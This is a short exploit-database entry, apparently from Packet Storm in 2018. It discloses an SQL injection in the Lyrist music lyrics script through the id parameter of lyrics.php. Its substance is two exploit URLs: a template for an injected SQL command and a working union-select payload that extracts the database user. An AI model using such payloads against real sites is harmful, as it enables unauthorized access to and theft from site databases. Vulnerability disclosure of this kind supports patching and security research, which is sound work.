Lyrist SQL Injection

2018-05-27T00:00:00
ID PACKETSTORM:147954
Type packetstorm
Reporter Meisam Monsef
Modified 2018-05-27T00:00:00

Description

                                        
                                            `# Exploit Title: Lyrist - Music Lyrics Script - SQL Injection  
# Date: 2018-05-26  
# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce  
# Vendor Homepage: https://www.codester.com/items/7250/lyrist-music-lyrics-script  
# Version: All Version  
  
  
Exploit :  
http://site.com/lyrics.php?id=-9999%27+[SQL+Command]+%23  
http://site.com/lyrics.php?id=-9999%27+union+select+1,2,3,user(),5,6,7,8,9,10,11+%23  
  
  
`